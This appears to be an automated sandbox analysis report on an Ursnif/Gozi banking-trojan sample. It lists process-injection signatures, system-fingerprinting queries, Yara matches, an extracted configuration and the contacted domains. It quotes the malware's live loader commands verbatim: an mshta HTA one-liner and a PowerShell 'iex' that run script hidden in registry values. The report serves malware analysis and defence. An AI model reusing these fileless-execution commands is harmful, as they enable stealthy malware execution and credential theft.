HIPS / PFW / Operating System Protection Evasion:

Benign windows process drops PE files
Source: C:\Windows\System32\wscript.exe | File created: PGpPBocoGo.txt.0.dr
Allocates memory in foreign processes
Source: C:\Windows\SysWOW64\regsvr32.exe | Memory allocated: C:\Windows\System32\control.exe base: 6F0000 protect: page execute and read and write
Maps a DLL or memory area into another process
Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection; target PID 5160 is the control.exe instance matched by the Ursnif Yara rule above, so the four entries from "Allocates memory" to "Writes to foreign memory regions" are one allocate / write / set-context injection sequence into the sacrificial control.exe)
Source: C:\Windows\SysWOW64\regsvr32.exe | Thread register set: target process: 5160
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: C:\Windows\System32\control.exe base: 6F0000
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\\PGpPBocoGo.txt
Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\AppDataLow\\Software\\Microsoft\\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9\\Analager'));if(!window.flag)close()</script>'
Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe /?
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9').BingckDS))
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown | Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\AppDataLow\\Software\\Microsoft\\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9\\Analager'));if(!window.flag)close()</script>'
Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\AppDataLow\\Software\\Microsoft\\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9\\Analager'));if(!window.flag)close()</script>'
May try to detect the Windows Explorer process (often used for injection)
Source: regsvr32.exe, 00000002.00000002.1491539427.0000000001210000.00000002.00000001.sdmp, regsvr32.exe, 00000003.00000002.1494990709.00000000032C0000.00000002.00000001.sdmp | Binary or memory string: Program Manager
Source: regsvr32.exe, 00000002.00000002.1491539427.0000000001210000.00000002.00000001.sdmp, regsvr32.exe, 00000003.00000002.1494990709.00000000032C0000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
Source: regsvr32.exe, 00000002.00000002.1491539427.0000000001210000.00000002.00000001.sdmp, regsvr32.exe, 00000003.00000002.1494990709.00000000032C0000.00000002.00000001.sdmp | Binary or memory string: Progman
Source: regsvr32.exe, 00000002.00000002.1491539427.0000000001210000.00000002.00000001.sdmp, regsvr32.exe, 00000003.00000002.1494990709.00000000032C0000.00000002.00000001.sdmp | Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Contains functionality to query locale information (e.g. system language)
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,3_2_727210EC
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_0506733B cpuid 3_2_0506733B
Queries the installation date of Windows
Source: C:\Windows\SysWOW64\regsvr32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Queries the volume information (name, serial number etc.) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Contains functionality to create pipes for IPC
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_05064134 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError,3_2_05064134
Contains functionality to query local / system time
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_72721C57 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,LdrInitializeThunk,MapViewOfFile,GetLastError,CloseHandle,GetLastError,3_2_72721C57
Contains functionality to query the account / user name
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_0506476B RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,3_2_0506476B
Contains functionality to query the Windows version
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_727217E2 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,3_2_727217E2
Queries the cryptographic machine GUID
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Ursnif
Source: Yara match | File source: 00000003.00000003.1353644779.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1354092603.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1354065367.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1480556329.0000000004F70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.1496607030.0000000005060000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1353849678.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.1500022737.000000000066E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1353529951.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1397537618.0000000004C9B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1353755956.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1353937634.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1354012081.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: control.exe PID: 5160, type: MEMORY
Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 3660, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif
Source: Yara match | File source: 00000003.00000003.1353644779.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1354092603.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1354065367.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1480556329.0000000004F70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.1496607030.0000000005060000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1353849678.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.1500022737.000000000066E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1353529951.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1397537618.0000000004C9B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1353755956.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1353937634.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1354012081.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: control.exe PID: 5160, type: MEMORY
Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 3660, type: MEMORY

Malware Configuration

Threatname: Ursnif

{"server": "730", "os": "10.0_0_17134_x64", "version": "250137", "uptime": "404", "system": "96ab1502108db75b005f32e9fdb6fa37hh", "size": "200780", "crc": "2", "action": "00000000", "id": "2000", "time": "1587579570", "user": "b0e80f0d54c8a3b79c4b2eb5591a3ea3", "hash": "0x0d8e127a", "soft": "3"}

Behavior Graph

Behavior Graph ID: 224571, Sample: open_attach_n2k.js, Startdate: 22/04/2020, Architecture: WINDOWS, Score: 100 (graph image not available; node and edge data recovered from the page)
  • Start: api10.dianer.at; signatures: Multi AV Scanner detection for domain / URL, Found malware configuration, Multi AV Scanner detection for submitted file, 8 other signatures; started wscript.exe (3) and iexplore.exe (1 421)
  • wscript.exe: dropped C:\Users\user\AppData\...\PGpPBocoGo.txt, PE32; signatures: Benign windows process drops PE files, JScript performs obfuscated calls to suspicious functions; started regsvr32.exe
  • iexplore.exe (1 421): started iexplore.exe (10 259), iexplore.exe (258), iexplore.exe (258)
  • iexplore.exe (10 259): f1.pipen.at 47.241.106.208, 49939, 49940, 49941 unknown United States
  • regsvr32.exe: started regsvr32.exe (2 1)
  • regsvr32.exe (2 1): signatures: Detected Gozi e-Banking trojan, Writes to foreign memory regions, Allocates memory in foreign processes, 5 other signatures; started mshta.exe (22) and control.exe